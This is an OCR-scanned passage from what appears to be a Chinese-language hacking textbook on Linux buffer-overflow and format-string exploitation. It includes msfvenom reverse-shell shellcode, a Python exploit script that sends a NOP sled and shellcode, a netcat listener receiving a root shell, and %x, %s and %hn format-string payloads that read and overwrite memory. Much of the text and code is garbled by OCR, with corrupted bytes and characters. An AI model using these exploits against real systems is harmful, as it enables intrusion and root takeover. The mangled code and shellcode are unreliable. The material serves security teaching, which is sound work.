buf += ™\x51\x53\xb3\x03\x89\xel\xcd\x80\x52\x68\x6e\x2£\x73" 

buf += "\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xel\xb0" 

buf += ™\x0b\xcd\x80" 


LHOST 和 LPORT 分 别 是 侦 听 主机 所 在 的 地 址 和 端口 。N 选 项 表示 生成 Python 
代码 。 上 面 的 输出 存在 问题 : 一 个 空 字符 全 在 字符 串 中 间 。 这 对 于 我 们 的 漏洞 攻击 
程序 来 说 不 可 行 ， 因 为 它 会 被 视 为 字符 串 的 结束 标记 ， 所 以 攻击 载 集 的 其 余部 分 不 
会 执行 .Metasploit 对 此 有 一 个 修复 工具 msfvenom, 用 来 对 字符 串 编 码 以 消除 坏 字 从 。 


root@kali:~/book# msfvenom -p linux/x86/shell reverse tcp -b '\x00' \ 

-f python LHOST-192.168.192.192 LPORT=8675 

No platform was selected, choosing Msf::Module::Platform::Linux from 
the payload 

No Arch selected, selecting Arch: x86 from the payload 

Found 10 compatible encoders 

Attempting to encode payload with 1 iterations of x86/shikata ga nai 

x86/shikata ga nai succeeded with size 95 (iteration=0) 

x86/shikata ga nai chosen with final size 95 

Payload size: 95 bytes 

Final size of python file: 470 bytes 
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buf = ™™ 

buf += "\xb8\x7a\x9c\x2a\xd0\xda\xca\xd9\x74\x24\xf4\x5b\x31" 
buf += ™\xc9\xb1\x12\x31\x43\e12\x03\x43\x12\%83\x91\x60\xc8" 
buf += "\x25\x54\x42\xfa\x25\xc5\x37\x56\xc0O\xeb\x3e\xb9\xa4" 
buf += "\x8d\x8d\xba\x56\x08\xbe\x84\x95\x2a\xf7\x83\xdc\x42" 
buf += ™\xc8\xdc\xd£\x52\xa0\xle\xe0\x/3\xd2\x96\x01\xc3\x72" 
buf += "\xf9\x90\x70\xc8\xfa\x9b\x97\xe3\x7d\xc9\x3£\x92\x52" 
buf += "\x9d\xd7\x02\x82\x4e\x45\xba\x55\x73\xdb\x6f\xef\x95" 
buf += "\x6b\x84\x22\xd5" 


将 -b "x00 225 SACKS SEE TT Fa, WAR A REN. KI NTE LE 
了 用 于 实现 最 终 漏洞 攻击 程序 的 Python 脚本 中 的 shellcode。 

5. 验证 漏洞 攻击 

退出 gdb 并 关闭 任何 可 能 仍 在 运行 的 漏洞 程序 后 ,可 重新 司 动 并 用 最 终 的 漏 铜 攻 
击 程序 进行 测试 : 


#!/usr/bin/python 
import socket 


total = 1024 # Total Length of Buffer String 
off = 264 
sc 一 mm 


sc t= "\xb8\x7a\x9c\x2a\xd0\xda\xca\xd9\x74\x24\xf4\x5b\x31" 
Se = \xeQ\xbl x12\x31\xA3 x12\x0a xd x1l2 Bd ee GODA CE” 
SC t= "\x25\x54\x42\xfa\x25\xc5\x37\x56\xc0\xeb\x3e\xb9\xa4" 
Sc += "\x8d\x8d\xba\x56\x08\xbe\x84\x95\x2a\xf7\x83\xdc\x42" 
SC t= "\xc8\xdc\xdf\x52\xa0\xle\xe0\x73\xd2\x96\x01\xc3\x72" 
sc += "\xf9\x90\x70\xc8\xfa\x9b\x97\xe3\x7d\xc9\x3£\x92\x52" 
sc t= "\x9d\xd7\x02\x82\x4e\x45\xba\x55\x73\xdb\x6f\xef\x95" 
sec F= "\x6b\x84\x22\xd5" 


noplen = 32 


jmp = "\x78\xf3\xff\xb£" # NOP sled address 

S = socket.socket () 

SG oconnectii"Localboüst" . 3355) ) Connect to server 
print s.recv(1024) # Receive Banner 
exploit = "" # Build Exploit String 


exploit += "A"*off + jmp + "\x90"*noplen + sc 
exploit +="C"* (total-off—-4-len (sc) -noplen) 


s.send(exploit) # Send Exploit String 
5.close 
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若 开启 了 侦 听 器 并 随后 运行 Python 脚本 ， 我 们 应 该 得 到 想 要 的 shell。 


root@kali:~# nc -vvvnl -p 8675 

listening on [any] 8675 ... 

connect to [192.168.192.192] from (UNKNOWN) [192.168.192.192] 35980 

id 

uid-0 (root) gid=0 (root) groups=0 (root) 

它 可 以 工作 了 ! WETS TIMBRE A, RITR ST asi 
连接 。 连 接 后 ， 我 们 没有 看 到 提示 符 ， 但 可 以 在 该 shell 中 执行 命令 。 如 果 输 入 id， 
就 会 得 到 期 望 的 啊 应 ， 而 任何 其 他 终 闹 ( 如 pico 及 其 他 编辑 右 ) 却 没有 啊 应 。 然 而 ， 如 
果 拥 有 根 Goob 权 限 ， 则 我 们 可 以 目 行 沃 加 用 户 (和 右 需 要 交互 式 登 录 的 话 )。 这 样 ， 我 
们 可 以 完全 控制 系统 。 


11.5 本草 小 结 


在 探索 Linux 漏 洞 攻击 的 基础 知识 时 , 我 们 研究 了 一 些 成 功利 用 缓冲 区 溢出 来 提 
升 权限 或 者 获得 远程 访问 的 方法 。 通 过 填充 相 比 缓冲 区 分 配 所 得 的 更 多 的 空间 ， 可 
以 改写 栈 指针 (ESP)、 基 址 指针 (EBP) 和 指令 指针 (EIP) 来 控制 代码 执行 的 部 分 。 通 过 
将 代码 执行 重 定向 到 我 们 提供 的 shellcode， 就 可 以 劫持 这 些 二 进 制 程序 的 执行 以 获 
得 额外 的 访问 权 。 

值得 注意 的 是 ,我 们 可 将 存在 漏洞 的 SUID 程 序 当 作 攻 击 目标 来 提升 权限 。 借 此 
可 获得 与 SUID 程 序 所 有 者 同等 的 权限 。 在 发 掘 漏洞 利用 的 过 程 中 ,我 们 可 以 通过 注 
入 shell、 调 用 侦 听 器 的 套 接 字 和 其 他 功能 来 灵活 地 生成 攻击 载 答 。 

当 构 建 漏洞 攻击 程序 时 , 我 们 使 用 了 一 些 构件 , 包括 pattern_create 和 pattern_offset 
这 些 工具 ， 以 及 NOP 雪 机 和 填充 来 帮助 我 们 ;准确 定位 代码 。 当 把 所 有 这 些 结合 在 一 
起 时 , 我 们 就 可 以 按照 本 章 概述 的 步骤 , 创建 一 个 通用 框架 来 创建 漏洞 利用 代码 了 。 
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阅读 完 第 11 盖 ， 在 车 握 了 基本 知识 后 ， 现 在 可 以 开始 可 以 研究 更 部 级 的 Linux 
漏洞 攻击 技术 。 这 个 领域 是 不 断 肥 展 的 ， 黑 客 们 总 会 有 友 现 新 的 攻击 技术 ， 而 负责 | 
卫 的 开发 者 们 也 在 不 断 地 推出 应 对 之 策 。 无 论 从 哪个 角度 去 解决 问题 ， 仅 掌握 基础 
知识 是 不 够 的 。 也 融 是 说 ， 从 本 书 中 能 学 到 的 知识 和 技能 是 有 限 的 ， 而 漫长 的 拉 术 
学 习 之 旅 才刚 刚 开 始 。 本 半 的 “扩展 阅读 ”中 的 内 容 将 为 你 提供 更 多 研究 方 问 。 


本 章 将 讲解 如 下 高 级 Linux 漏洞 攻击 类 型 
。 格式 化 字符 串 漏洞 攻击 
。 内 存 保护 机 制 


12.1 格式 化 字符 串 漏洞 攻击 


格式 化 字符 串 汤 洞 攻击 是 在 2000 年 年 底 开 始 公 开 的 。 与 缓冲 区 洲 出 不 同 的 是 ， 
格式 化 字符 串 错误 在 源 代码 和 二 进 制 分 析 中 相对 容易 发 现 。 虽 然 如 此 ， 格 式 化 字符 
串 漏洞 攻击 在 当今 的 应 用 程序 中 依然 十 分 常见 。 很 多 组 织 在 发 布 软件 前 不 使 用 代码 
分 析 或 二 进 制 分 析 工 具 ， 因 此 ， 代 人 码 错 误 依 然 从 生 。 这 些 问 题 一 经 发 现 ， 通 党 可 快 
速 解决 把。 随 着 更 多 组 织 在 构建 过 程 中 使 用 代码 分 析 工 具 ， 此 类 攻击 的 数量 将 持续 
减少 。 但 这 些 攻击 行为 很 容易 发 现 ， 会 导致 一 些 有 趣 的 代码 执行 。 
12.1.1 格式 化 字符 串 

格式 化 字符 串 由 各 种 print 函 数 使 用 。 换 言 之 ， 根 据 所 提供 的 格式 化 字符 串 的 不 
同 ， 函 数 的 行为 表现 可 能 会 干 差 万 别 。 下 面 是 众多 现 有 的 格式 化 函数 中 的 一 部 分 (更 
完整 的 清单 请 参见 本 章 的 “参考 文献 ”): 

e printf0 将 输出 结果 打印 到 标准 输入 /输出 (STDIO) 句 椭 ( 通 第 是 屏幕 ) 

e fprintf0 将 输出 结果 打印 到 文件 流 

e SprintfO 将 输出 结果 打印 到 字符 串 

e SnprintfO 将 输出 结果 打印 到 字符 串 ， 内 置 长 度 检 查 

当 调用 其 中 一 个 函数 时 ， 格 式 化 字符 串 指出 如 何 将 数据 编译 为 最 终 字 符 串 以 及 
放 在 何 处 。 格 式 化 字符 串 变 化 多 端 ， 如 果 应 用 程序 创建 者 允许 在 其 中 一 个 格式 化 字 
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符 串 中 百 接 使 用 终 闪 用 户 指 定 的 数据 ， 用 尸 可 能 更 改 应 用 程序 的 行为 。 这 包括 泄露 
创建 痢 本 来 不 想 公 开 的 附加 信息 ， 如 内 存 地 址 、 数 据 变量 和 堆栈 内 存 。 

其 他 参数 也 可 恋 与 内 存 地 址 。 由 于 此 类 功能 ， 格 式 化 字符 串 的 漏洞 风险 可 能 出 
现在 从 信息 泄露 到 代码 执行 的 任意 地 方 。 本 和 章 将 分 析 信 息 泄 露 和 代码 执行 ， 并 讨论 
如 何 将 它们 组 合 在 一 起 ， 利 用 格式 化 字符 串 的 弱点 进行 漏 调 攻 击 。 


1. 问题 

在 第 2 草 中 曾经 讲 过 , printf0 函 数 可 市 有 任意 多 个 参数 。 这 里 讨论 如 下 两 种 形式 : 

printf (<format string», «list of variables/values»); 

printf(«user supplied string»); 

在 第 一 种 形式 中 ， 程 序 员 指定 了 格式 化 字符 串 ， 其 后 是 变量 ， 变 量 将 填充 由 数 
据 的 格式 化 字符 串 指定 的 空间 。 这 可 以 防止 printf 函 数 出 现 超出 预期 的 行为 。 第 二 种 
形式 允许 用 户 指定 格式 化 字符 串 ， 这 意味 着， 用 户 可 按 他 们 想 要 的 方式 使 用 printf 

表 12-1 介 绍 了 可 在 格式 化 字符 申 中 使 用 的 另外 两 种 格式 控制 符 一 9%hn 和 
<number>$ (为 便于 查询 ， 这 里 也 包含 了 最 初 在 表 2-2 中 列 出 的 4 种 符号 )。 


表 12-1 利用 的 格式 控制 侍 

格式 控制 符 示例 

| 要 printf("testn"); 
? — 结果 : 应 用 程序 打印 test 
printf("test?od", 123); 
结果 : 应 用 程序 打印 test 123 
printf("test 96s"," 123"); 
结果 : 应 用 程序 打印 test 123 


9, 十 六 进 制 值 printf("test Vox", 0x123); 
^ DN 结果 :应 用 程序 打印 test 123 


将 当前 字符 串 的 长 度 (以 字 市 为 单位 ) printf("test %hn", var); 

打印 到 变量 var( 短 整 型 值 ， 窗 新 16 位 ) | 结果: 值 04 存 储 在 var 中 (两 个 字 市 ) 
printf("test %2$s", "12", "123"); 

9, number» $ 直接 参数 访问 结果 : test 123( 直 接 使 用 第 二 个 参 
数 ， 将 其 视 为 一 个 字符 串 ) 


%od 十 进 制 值 


0/08 
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2. 正确 的 使 用 方式 
回顾 一 下 使 用 printf0 函 数 的 正确 方式 。 例 如 ， 下 面 的 代码 : 


//fmtl.c 

include «stdio.h» 

int main() { 
printf("Ihis is à $3s.Xn", "test"); 
return D; 


} 
将 会 生成 如 下 输出 结果 : 


#9gcc -o fmt1 fmtl1.c 
# ./fmtl 
This is a test. 


3. 不 正确 的 使 用 方式 
现在 看 看 如 采 环 记 添加 %s 所 要 取代 的 值 会 及 生 什 么 情况 : 


II Fmt2 .0 

#include «stdio.h-» 

int main() { 
printf ("This is a $5.0" )95 
return 0; 


# gcc -o fmt2 fmt2.c 

#. /fmt2 

This is a eyé. 

全 出 结果 有 些 出 人 意料 。 看 上 去 像 是 希腊 文字 , 但 实际 上 是 机 器 语言 (二 进 制 代 
但 )， 以 ASCII 形 式 显 示 出 来 。 无 论 如 何 这 都 不 是 期 望 的 结果 。 更 糟糕 的 是 ， 考 谍 一 
下 如 果 按 照 类 似 的 方式 使 用 第 二 种 printfO 形 式 ， 会 发 生 什 么 情况 : 

//fmt3.c 

include «stdio.h» 

int main(int argc, char * argv[]) { 

printf (argv[1]); 


return 0; 


} 
如 采用 户 像 下面 这 样 运行 该 程序 ， 那 么 一 切 正 第 : 
#gcc -o fmt3 fmt3.c 


#./fmt3 Testing 
Testingi 
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光标 之 所 以 位 于 行 尾 ， 是 因为 我 们 没有 像 前 面 那样 使 用 m 回 车 符 。 但 如 末 用 户 
提供 一 个 格 却 化 字符 串 作 为 程序 得 入 ， 那 么 会 如 何 呢 ? 

#./fmt3 Testing$s 

TestingYyy ¢y# 

这 里 出 现 了 同样 的 问题 。 但 事实 证 明 后 一 种 情况 更 致命 ， 因 为 它 可 能 导致 彻底 
的 系统 威胁 。 为 了 弄 明日 这 里 完 苋 友 生 了 什么 ， 接 下 来 束 需 要 研究 堆栈 是 如 何 处 理 
格式 化 函数 的 。 


4. 格 却 化 盟 数 的 堆 枝 操作 
为 演示 格式 化 函数 的 堆栈 操作 ， 使 用 如 下 程序 : 


//fmt4.c 

#include <stdio.h> 

int main() { 
int one-1, two-2, three-3; 
printf("Testing $d, $d, $d!Mn", one, two, three); 
return 0; 

} 

Sgcc -o fmt4.c 


./£mt4 

Testing 1, 2, 3! 

fEprintf() E9467 HAA], FEF 的 堆栈 如 图 12-1 所 示 。 跟 往 和 一样， 按照 逆序 将 
printftO 函 数 的 参数 压 栈 ， 如 图 12-1 所 示 。 这 里 使 用 的 是 参数 变量 的 地 址 。 wa 
数 维护 看 一 个 内 部 指针 ， 刚 开 始 时 该 指针 指向 的 是 格式 化 字符 串 ( 或 栈 帧 顶部) 
后 开始 将 格式 化 字符 串 的 字符 输出 到 STDIO 句 柄 (在 这 里 是 指 屏幕 )， ei 
特殊 字符 。 


栈 顶 部 栈 底部 
内 存 低地 址 内 存 高 地 址 


图 12-1 printf PRAT IN HOMER 


如 果 遇 到 %,， 那么 printfO 函 数 会 期 望 它 后 面 跟着 的 是 一 个 格式 控制 符 ， 因此 将 
内 部 指针 向 栈 帧 底部 方向 递增 以 抓 取 该 格式 控制 符 的 输入 值 ， 该 输入 值 可 能 是 一 个 
变量 或 绝对 值 。 问 题 就 出 现在 这 里 ;: printfO 函 数 无 法 知道 堆栈 上 是 否 放置 了 正确 数 
目的 变量 或 值 可 供 操作 。 即 使 程序 员 比 较 粗心 ， 没 有 提供 足够 数目 的 参数 ， 或 者 多 
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许 用 户 自行 提供 格式 化 字符 串 , 但 函数 执行 时 栈 指针 仍 像 正 常情 况 一 样 向 下 移动 (向 
内 存 高 地 址 方向 移动 )， 抓 取 下 一 个 值 以 满足 格式 化 字符 串 的 需要 。 因 此 ， 我 们 在 前 
一 个 示例 中 看 到 ，printt0 函 数 从 堆栈 上 抓 取 下 一 个 值 并 将 其 返回 到 格式 控制 符 要 求 
的 地 方 。 


aa TER: 反 儿 杠 (\) 会 由 编译 器 处 理 并 用 于 将 其 后 的 字符 转 义 。 这 是 向 程序 伟 
ees 弟 特 殊 衬 符 而 不 是 按照 其 字面 意思 解释 的 一 种 方法 。 如 果 遇 到 \x， 那 么 编 
译 器 将 以 为 \ 后 面 跟着 一 个 数字 并 将 该 数字 转换 成 十 六 进 制 表示 形式 ,然后 
进行 处 理 。 


5 影响 


这 个 问题 影响 深远 。 在 最 好 的 情况 下 , 栈 值 可 能 包 侣 一 个 随机 的 十 六 进 制 数字 ， 
而 格式 化 字符 串 可 能 会 将 其 解释 为 一 个 越界 的 地 址 ， 从 而 导致 进程 出 现 段 错 误 。 这 
可 能 被 攻击 者 利用 以 实施 拒绝 服务 攻击 。 

但 在 最 粳 糙 的 情况 下 ， 细 心 和 技艺 高 超 的 攻击 者 或 许 能 够 利用 这 个 缺陷 来 读 取 


s, LL] 


LE 


任意 数据 和 回 任 意 地 址 写 入 数据 。 实 际 上 ， 如 末 攻 击 者 能 重 与 内 存 中 的 未 些 位 置 ， 
束 可 能 获得 根 权 限 。 


6. 漏洞 程序 示例 
在 本 市 的 剩余 部 分 ， 我 们 将 使 用 下 和 面 的 漏洞 代码 演示 各 种 可 能 性 : 


//tmtstr.c 

#include <string.h> 

#include <stdio.h> 

int main(int argc, char *argv[]) { 
static int canary=0; // stores the canary value in .data section 
char temp[2048]; // string to hold large temp string 
strcpy(temp, argv[1]); // take argvl input and jam into temp 
printf (temp); // print value of temp 
BEXHEF("An")s // print carriage return 
printf("Canary at 0x$08x = 0x$08xXn", &canary, canary); 

//print canary 


} 


#gcc -o fmtstr fmtstr.c 

# ./fmtstr Testing 

Testing 

Canary at 0x80002028 = 0x00000000 
#chmod uts fmtstr 

5 
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注意 : canary 的 值 现在 还 只 是 一 个 占 位 符 。 重 要 的 是 要 明白 ， 你 自己 的 值 
肯定 会 有 所 不 同 。 就 此 而 言 ， 本 章 的 这 些 示 例 在 真正 的 系统 中 运行 时 将 可 
能 产生 不 同 的 值 ， 但 结果 应 该 是 一 样 的 。 


12.1.2 ”实验 12-1: 从 任意 内 存 读 取 


现在 开始 利用 这 个 漏洞 程序 。 我 们 将 采用 循序 渐进 的 方式 进行 介绍 。 下 面 承 开 
始 吧 ! 


COM GER: 本 实验 像 其 他 所 有 实验 一 样 ， 唯 一 的 README 文 件 内 含 设置 说 明 。 
a 
=“ 


1. 使 用 %x 映射 堆栈 


如 表 12-1 所 示 ，%x 格 式 控制 符 用 于 提供 十 六 进 制 值 。 因 此 ， 通 过 回 这 个 漏 调 程 
序 提供 几 个 %08x 标 记 ， 应 该 能 将 栈 值 输出 到 屏幕 上 : 
S ./fmtstr "AAAA $08x $08x $08x $08x $08x $08x $08x" 


AAAA bffff5c4 00000000 8000061a 00000000 00000000 00000000 41414141 
Canary at Oxbfftftft3/c = 0Ox00000000 


Krpos HF EXN TANARBO FE 9E). TERR, PEF AR 
存储 于 堆栈 上 ， 这 一 点 可 由 屏幕 上 出 现 的 AAAA(Ox41414141) 测 试 字 符 串 证 明 。 在 
本 例 中 ， 需 要 7 个 %08x 标 记 来 获得 0x41414141。 但 这 因 系 统 而 异 ， 具 体 取决 于 操作 
系统 版 本 、 编 详 肯 版 本 或 其 他 因 系 。 要 找到 这 个 值 ， 只 需要 以 两 个 %08x 标 记 开 头 ， 
使 用 蛮 力 方法 不 断 增加 %08x 标 记 的 数目 ， 直 至 找到 格式 化 字符 串 的 开头 。 对 于 这 个 
向 单 示 例 (fmtstr)，%08x 标 记 的 数量 ( 称 为 偏 移 ) 被 定义 为 7。 


2. 使 用 %s 读 取 任意 字符 串 


因为 我 们 控制 着 格式 化 字符 串 ， 所 以 我 们 能 将 几乎 任何 内 容 放 入 该 字符 串 中 。 
例如 ， 如 果 和 希望 读 取 第 4 个 参数 处 的 值 ， 那 么 只 需要 将 第 4 个 格式 控制 符 蔡 换 成 %s 
即 可 ， 如 下 所 示 : 

$ ./fmtstr "AAAA $08x $08x $08x $s" 

Segmentation fault 

$ 

这 里 为 什么 会 出 现 段 错 误 ? HUT SABE, %s 格 式 控 制 从 将 从 堆栈 上 读 取 下 一 
个 参数 (在 这 里 是 指 第 4 个 参数 ), 然后 将 其 当 作 一 个 内 存 地 址 来 读 取 数据 (通过 引用 )。 
这 里 ， 第 4 个 值 是 AAAA， 翻 译 成 十 六 进 制 表 示 就 是 0x41414141， 而 第 10 章 曾经 提 
到 过 ， 这 样 做 会 导致 段 错误 。 
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3. 读 取 任意 内 存 


那么 如 何 从 任意 内 存 位 置 读 取 数据 呢 ? 方法 很 简单 : 只 需要 提供 位 于 当前 进程 
段 内 的 有 效 地 址 即 可 。 下 面 的 助手 程序 getenv 会 帮助 我 们 寻找 一 个 有 效 地 址 : 


#include <stdlib.h> 

#include <stdio.h> 

int main(int argc, char *argv[]) { 
char * addr; //simple string to hold our input in bss section 
addr = getenv(argv[1]); //initialize the addr var with input 
printf("$s is located at %p\n", argv[1], addr);//display location 

} 


$ gcc -o getenv getenv.c 
这 个 程序 用 于 从 系统 中 获取 环境 变量 的 位 置 。 为 测试 这 个 程序 ， 下 面 检查 一 下 
SHELIL 变 量 (存放 痢 当 前 用 户 shell 的 位 置 ) 的 位 置 : 


$ ./getenv SHELL 
SHELL is located at Oxbffffflc 


注意 : 别 忘 了 在 当前 的 Kali 发 行 版 上 禁用 ASLR 功 能 。 SM), SHELLZ SH 


AS 地 址 将 会 变化 ， 而 后 续 实验 也 无 法 成 功 完成 . 


现在 有 了 一 个 有 效 的 内 存 地 址 ， 让 我 们 试 一 下 。 首 先 ， 记 得 将 内 存 地 址 反 转 ， 
因为 这 个 系统 采用 的 是 低位 优先 字 节 序 (little-endiam)， 

S ./fmtstr ‘printf "\xle\xff\xff\xbf"`" $08x $08x $08x $08x $08x $08x $s" 
9949 pffff8a9 00000000 8000064a 00000000 00000000 00000000 191:9^919 97 
x079r 

E 

9999. 

13 

xd80'999939O/Lin/sh 
Canary at ÜOxbffff6dc = 0x00000000 


成 功 ! 我 们 已 能 从 给 定 地 址 读 取 直到 第 一 个 null 字 符 之 前 的 数据 (SHELL 环 境 变 
量 )。 可 花 点 时 间 再 做 些 试验 ， 如 检查 其 他 环境 变量 的 值 。 要 列 出 当前 会 话 的 所 有 环 
卉 变量 ， 可 在 shell 提 示人 符 中 输入 env | more. 

4. 利用 直接 参数 访问 来 简化 处 理 

为 进一步 向 化 过 程 ， 甚 全 可 通过 所 谓 的 直接 参数 访问 (Direct Parameter Access) 
拉 术 从 堆栈 上 访问 第 7 个 参数 ,可 使 用 #9$ 格 式 控制 从 指示 格式 化 函数 跳 过 几 个 参数 而 
直接 选中 某 个 参数 。 下 面 是 一 个 例子 : 
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//dirpar.c 

include <stdio.h> 

int main() { 

printf ("This is a %39s.\n", 1, 2, "Lest"); 

} 

$gcc -o dirpar dirpar.c 

S./dirpar 

This is a test. 

2 

现在 ， 当 在 命令 行 上 使 用 直接 参数 格式 控制 从 时 ， 需 要 使 用 \ 将 字符 $ 转 义 ， 这 
样 束 可 以 阻止 shell 解 释 字 符 $。 下 面 运用 该 技术 重新 打 FISHELL 坏 境 变 量 的 位 置 : 


imbBEP peine “Wale xe xe be” Ua 7X Su" 
999:9:1:9^91997 


x079r 
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xdeG 99999 /bin/sh 


Canary at Oxbtfftf6ec = Ox00000000 
DX. PSUR AT E BUSES f] 


tV BR: 上面 的 格式 适用 于 bash。 其 他 shell( 如 tcsh) 需 要 其 他 格式 ， 例 如 : 
c $5 ./fmtstr “printf "\x84\xfd\xff\xb£" '"S7\$s" 


注意 在 行 尾 使 用 的 单 引 号 。 为 简化 本 章 剩余 部 分 的 示例 ， 我 们 将 使 用 bash 
shell, 


利用 格式 化 字符 串 错误 ,我 们 可 以 指定 printf 及 其 他 打印 函数 的 格式 ， 从 一 个 程 
序 读 取 任意 内 存 。 使 用 %x， 我们 可 打印 十 六 进 制 值 以 查找 堆栈 中 参数 的 位 置 。 一 旦 
知道 值 的 存储 位 置 ， 就 可 确定 如 何 使 用 printf 对 其 进行 处 理 。 通过 指定 内 存 位 置 及 其 
关联 的 %s 指 令 ， 可 以 打印 出 应 用 程序 在 指定 位 置 的 字符 串 值 。 

而 利用 直接 参数 访问 ， 我 们 不 需要 遍历 堆栈 上 不 相关 的 值 。 如 果 已 知 位 置 是 在 
堆栈 中 ,我们 可 使 用 %38$s 打 印 第 3 个 参数 ， 使 用 %4$s 打 印 第 4 个 参数 。 这 将 使 我 们 能 
读 取 应 用 程序 空间 中 任意 内 存 地 址 的 值 ， 只 要 该 地 址 不 为 空 即 可 。 


12.1.3 ”实验 12-2: 写 入 任意 内 存 


在 本 例 中 ， 将 尝试 用 shellcode 的 地 址 (存储 在 内 存 中 以 备 后 用 ) 来 重 写 canary 地 址 
0xbffff6dc 处 的 值 。 之 所 以 使 用 这 个 地 址 ， 是 因为 每 次 运行 fmtstr 时 它 都 可 见 ， 但 随 
后 我 们 将 看 到 如 何 重 写 几 乎 任何 地 址 。 
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1. 魔术 公式 


下 如 Blaess、Grenier 和 Raynal 给 出 的 那样 ， 同 内 存 中 写 入 4 个 字 市 的 最 简 捍 方法 
是 将 其 划分 成 两 块 (两 个 高 位 字 市 和 两 个 低位 衬 市 ), 然后 使 用 #8 和 %hn 标 记 将 它们 放 
入 正确 位 置 。 

例如 ， 下 面 将 前 一 章 中 的 shellcode 放 入 一 个 环境 变量 中 ， 然 后 检索 它 的 位 置 : 

$ export SC-'cat Se 

$ ./getenv SC 

SC is located at Oxbffffflc I!!! Pl yours will be different!!!!!! 

如 果 和 希望 把 SC 值 写 入 内 存 ， 那 么 可 将 它 划 分 成 两 个 值 : 

e WARM (HOB): Oxbfff 

e 两 个 低位 字 攻 (LOB): oxfflc 

可 以 看 出 ， 这 里 HOB 小 于 LOB， 因 此 对 应 于 表 12-2 中 的 第 1 列 。 表 12-2 显 示 的 魔 
术 公 式 能 帮助 我 们 构建 用 于 重 写 任意 地 址 (这 里 是 canary 地 址 0xbffff6dc) 的 格式 化 字 
TP. 


412-2 tr 5b Bie V BAY BEART 


注意 第 二 个 16 比 特 在 


[addr + 2][addr] [addr + 2][addr] . \xde\xfo\xf 
BU T] 


使 用 点 () 来 确保 整 | obf- 8 的 十 进 制 等 于 49 143, 
数 。 采 用 十 进 制 表示 | 因此 表示 为 %.49143x 


o%[offsetl$hn "Woffet--1$hn | | wnshn 


| | | 使 用 点 () 来 确保 整 | Oxfflc - 0xbfff 的 十 进 制 等 于 
%[LOB-—HOB]x | %IHOB-LOBK | || _ B s 
数 。 采 用 十 进 制 表 示 | 16 157， 因 此 表示 为 %.16157x 


wloffset+1]8hn | %foffsetsin | | %8\$hn 


2. 使 用 canary 的 值 进行 练习 
使 用 表 12-2 构 建 格 式 化 字符 串 ， 然 后 试 着 用 shellcode 的 位 置 来 重 写 canary 的 值 。 


xbf \xde\xf6\xffixbf 


% [HOB — 8]x % [LOB — 8]x 


UN\ BS: 在 此 必须 理解 的 一 点 是 ， 这 里 的 程序 名 (getenv 和 fmtstD 必 须 具 有 相 
== 同 的 长 度 。 这 是 因为 在 局 动 时 程序 名 存储 在 堆栈 上 ， 因 此 如 果 名 称 的 长 度 
不 同 ， 那 么 这 两 个 程序 就 会 有 具有 不 同 的 环境 (在 这 里 shellcode 的 位 置 也 会 
不 同 )。 如 果 两 个 程序 采用 不 同 的 名 称 ， 那 就 需要 考虑 到 这 个 差异 ， 或 者 简 
单 地 将 它们 重 命名 成 相同 的 长 度 ， 这 样 一 来 这 些 示 例 才 能 正常 运行 。 
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为 了 构造 注入 缓冲 区 ， 使 用 0xbffffflc 来 重 写 canary 地 址 0xbffff6dc 处 的 值 ， 可 以 
参照 表 12-2 中 的 公式 。 对 右 侧 列 中 计算 出 的 值 使 用 如 下 命令 : 


./fmtstr “printf "\xde\xf6\xff\xbf\xdc\xf6\xff\xbf" %.49143x7\ 
Shn%.16157x%8\Shn 


生成 的 结果 如 下 : 


99999090994900000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000 
00000000000000000000000000000000000000000000000000000000000000000 
0000000000000000000000000000000000 

<A whole bunch of 0s» 

Canary at Oxbffffode = Oxbffffflc 


(NM 警告 : 需要 再 次 说 明 的 是 ， 你 所 见 到 的 值 可 能 会 与 这 里 不 同 。 首 先 运行 


NS getenv 程 序 ， 然 后 使 用 表 12-2 计 算出 你 自己 的 值 。 此 外 ， 在 printf 和 双 引 号 
之 间 实 际 上 并 没有 换行 符 。 


使 用 字符 串 格式 漏洞 ， 我 们 还 可 以 写 内 存 。 利 用 表 12-2 中 的 公式 ， 可 选取 应 用 
程序 的 内 存 位置 并 重 写 值 。 表 12-2 使 得 计算 那些 需要 被 履 辣 以便 操纵 的 数值 在 数学 
上 很 容易 ， 然 后 将 这 些 值 写 入 一 个 特定 的 内 存 位 置 。 这 将 允许 我 们 改变 变量 值 并 建 
ALS ARN GE o 


12.1.4 实验 12-3: 改变 程序 执行 


那 该 怎么 做 呢 ? 我 们 可 重 写 多 级 canary 值 ， 这 是 一 个 大 工程 。 之 所 以 这 样 说 ， 
AA nE C, 于 
行 shellcode。 现 在 ， 只 需要 找到 一 些 允 许 我 们 控制 程序 执行 的 内 存 。 为 此 ， 需 要 了 
解 程 序 如 何 执行 函数 。 在 函数 执行 时 ， 会 保存 很 多 数据 ， 包 括 当 我 们 进入 函数 时 程 
序 的 位 置 。 保 存 这 些 数据 是 为 了 在 函数 调用 之 后 方便 地 返回 程序 ， 应 用 程序 需要 记 
住 离开 时 的 位 置 。 

进入 函数 时 应 用 程序 所 处 的 状态 称 为 帧 Grame)。 帧 中 包含 重要 数据 ， 如 程序 调 
用 前 指令 指针 (EIP) 的 位 置 , 变量 的 存储 位 置 ， 以 及 其 他 相关 的 控制 信息 。 分 析 帆 时 ， 
会 取出 EIP 已 保存 指针 的 地 址 ， 然 后 午 写 该 指针 。 此 后 ， 当 冰 数 返回 到 应 用 程序 时 ， 
不 是 返回 到 离开 位 置 ， 而 是 执行 shellcode。 


1. 查找 目标 


要 查找 准备 重 写 的 目标 地 址 , 需要 使 用 gdb 帮 助 确 定 函数 中 的 帧 信息 。 查 看 似乎 
简便 的 函数 时 ， 可 看 到 在 printf 执 行 字符 串 格 式 化 后 ， 将 返回 执行 额外 的 printf 语 句 。 
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因此 看 一 下 printf 中 帧 的 状况 , 在 代码 完成 工作 并 重 写 地 址 后 , 可 通过 重 写 printf 保 存 
的 EIP 地 址 立即 控制 程序 流 。 
下 面 再 次 分 析 fmtstr 二 进 制 代码 ， 这 次 使 用 gdb: 
$ gdb -q ./fmtstr 
Reading symbols from ./fmtstr...(no debugging symbols found)...done. 
(gdb) Q b printf 
Breakpoint 1 at 0x440 


(gdb) 9 r asdf 
Starting program: /root/chl2/fmtstr asdf 


@Breakpoint 1, . printf (format=0xbfffeeac "asdf") at printi.c:28 

28 printf.c: No such file or directory. 

局 动 gdb 后 ， 需要 设置 断 点 ,程序 将 在 到 达 断 点 时 停止 执行 。 此 时 , 断 点 是 printf 
